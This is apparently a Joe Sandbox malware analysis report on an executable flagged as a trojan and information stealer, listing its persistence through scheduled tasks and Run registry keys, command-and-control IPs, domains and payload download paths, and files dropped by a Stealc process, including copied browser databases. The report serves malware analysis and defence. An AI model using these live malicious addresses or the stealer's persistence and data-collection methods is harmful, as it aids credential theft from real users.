185.215.113.117	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
185.215.113.103	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520057
Start date and time:	2024-09-27 04:19:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	45
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@73/109@19/21
EGA Information:	Successful, ratio: 72.7%
HCA Information:	Successful, ratio: 59% Number of executed functions: 250 Number of non-executed functions: 145
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 142.250.186.131, 142.250.184.238, 173.194.76.84, 216.58.206.67, 142.250.186.67, 142.250.185.202, 142.250.186.74, 142.250.184.234, 142.250.184.202, 172.217.18.10, 142.250.186.106, 142.250.185.234, 172.217.16.202, 142.250.181.234, 216.58.206.42, 216.58.212.170, 142.250.186.170, 172.217.16.138, 142.250.186.138, 216.58.206.74, 142.250.186.42, 216.58.212.138, 172.217.23.106, 142.250.185.106, 142.250.185.74, 142.250.185.170, 172.217.18.106, 142.250.185.138
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, optimizationguide-pa.googleapis.com
Execution Graph export aborted for target axplong.exe, PID 4564 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 4720 because there are no executed function
Execution Graph export aborted for target file.exe, PID 5588 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:20:02	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
04:21:12	Task Scheduler	Run new task: Hkbsse path: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
04:21:35	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe
04:21:44	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
04:21:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c9a37ab27e.exe C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe
04:21:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2a8f2f9086.exe C:\Users\user\AppData\Local\Temp\1000355001\2a8f2f9086.exe
04:22:15	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 5140a3dea9.exe C:\Users\user\AppData\Local\Temp\1000023001\5140a3dea9.exe
04:22:35	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4f60833b22.exe C:\Users\user\1000026002\4f60833b22.exe
22:21:01	API Interceptor	3809x Sleep call for process: axplong.exe modified
22:21:12	API Interceptor	438x Sleep call for process: Hkbsse.exe modified
22:21:17	API Interceptor	42x Sleep call for process: RegAsm.exe modified
22:21:18	API Interceptor	46x Sleep call for process: hjhTHr6fWy.exe modified
22:21:22	API Interceptor	2x Sleep call for process: svchost.exe modified
22:21:28	API Interceptor	43x Sleep call for process: svchost015.exe modified
22:21:43	API Interceptor	34x Sleep call for process: newbundle2.exe modified
22:21:55	API Interceptor	6x Sleep call for process: fidovideorecorder32_64.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.202.233.158	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	file.exe	Get hash	malicious	CryptOne, Stealc, Vidar	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	SecuriteInfo.com.Win32.MalwareX-gen.167.30598.exe	Get hash	malicious	CryptOne, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	XpCyBwDzEt.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLine	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	e0OOofAl0S.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	oZB7n3wuNk.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
194.116.215.195	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	194.116.215.195/12dsvc.exe
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	194.116.215.195/12dsvc.exe
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	194.116.215.195/12dsvc.exe
185.215.113.26	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	185.215.113.26/Nework.exe
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	185.215.113.26/Nework.exe
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	185.215.113.26/Dem7kTu/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, Cryptbot, LummaC Stealer	Browse	185.215.113.26/Dem7kTu/index.php
	XpCyBwDzEt.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLine	Browse	185.215.113.26/Dem7kTu/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	185.215.113.26/Dem7kTu/index.php
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.26/Dem7kTu/index.php
	Original_Build.exe	Get hash	malicious	Raccoon Stealer v2	Browse	185.215.113.26/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
fragnantbui.shop	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
offensivedzvju.shop	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	file.exe	Get hash	malicious	Phorpiex	Browse	91.202.233.141
	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	172.86.66.70
	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	172.86.66.70
	sostener.vbs	Get hash	malicious	AsyncRAT, DcRat	Browse	91.202.233.169
	DRAFT BL - CLS930 KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exe	Get hash	malicious	XWorm	Browse	104.250.180.178
	6122.scr.exe	Get hash	malicious	Remcos	Browse	104.250.180.178
	6122.scr.exe	Get hash	malicious	Remcos	Browse	104.250.180.178
	DRAFT BL - CLS930 KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exe	Get hash	malicious	XWorm	Browse	104.250.180.178
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	91.202.233.158
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	91.202.233.158
VMAGE-ASRU	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	194.116.215.195
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	194.116.215.195
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	194.116.215.195
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	194.116.215.195
	jsJ6NIt35F.exe	Get hash	malicious	Go Injector, Stealc, Vidar	Browse	194.116.216.149
	1.exe	Get hash	malicious	Go Injector, RHADAMANTHYS	Browse	193.23.55.27
	1.bin.exe	Get hash	malicious	Go Injector, RHADAMANTHYS	Browse	193.23.55.27
	Catalog co.pdf.lnk	Get hash	malicious	MalLnk	Browse	45.89.53.91
	QTmGYKK6SL.exe	Get hash	malicious	Unknown	Browse	45.89.55.34
	laNODWeL05.elf	Get hash	malicious	Unknown	Browse	45.8.146.126
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	http://intesa-it.serv00.net/it/conto/	Get hash	malicious	Unknown	Browse	104.21.4.136 172.67.162.108 188.114.97.3 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136 172.67.162.108 188.114.97.3 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136 172.67.162.108 188.114.97.3 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136 172.67.162.108 188.114.97.3 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.21.4.136 172.67.162.108 188.114.97.3 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136 172.67.162.108 188.114.97.3 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136 172.67.162.108 188.114.97.3 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	Baylor financial-RemittanceSeptember 26, 2024_-YTRKOKQTQALJDQKMPCNJ.xlsx	Get hash	malicious	Unknown	Browse	104.21.4.136 172.67.162.108 188.114.97.3 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.4.136 172.67.162.108 188.114.97.3 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136 172.67.162.108 188.114.97.3 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\CBFCFBFBFBKFIDHJKFCAFCFBKJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFIIIJJKJKFHIDGDBAKJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBKKFCBA

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBook JS Plugin 9.26.47\EBook JS Plugin 9.26.47.exe

Download File

Process:	C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3117056
Entropy (8bit):	6.560473138005523
Encrypted:	false
SSDEEP:	49152:KYtaxqFC/PPqRsnxZniLwd2tnkbSJVKcD+YP://FWPqRsn7niLxk0Kc9P
MD5:	B19555358F3C9ABC6157B2B7AAB2F658
SHA1:	177FDA0D1D0444E6CF1CA8A915F5F2212BD092E1
SHA-256:	2B0062E5EF0C0BBC9034BA09296F47B26DD0528DD8131DCCFD10009A516B1104
SHA-512:	6BFF37EB0C5617FAB6512C9A31E701F04ABFE1B5EB1FA70B93C83DE9A118E434ECB1F49C6E7BAF5335AE32D8B04B296835F028CA8EEE7858C11A4797E07D64B0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VK.L.................."..........{"......."...@.........................../.....A]0.......................................".......#..>............................................................................"..............................text...J.".......".................`....rdata...1...."..@....".............@..@.data...XT... #..0... #.............@....rsrc....@....#..@...P#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EHJDGCBGDBKJKFHIECBAEHIDHJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FBKJKEHIJECGCBFIJEGI

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJDGCAEBFIIECAKFHIJEGIJEGC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKJDBAAAEHIEGCAKFHCG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\KKKJEHCG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
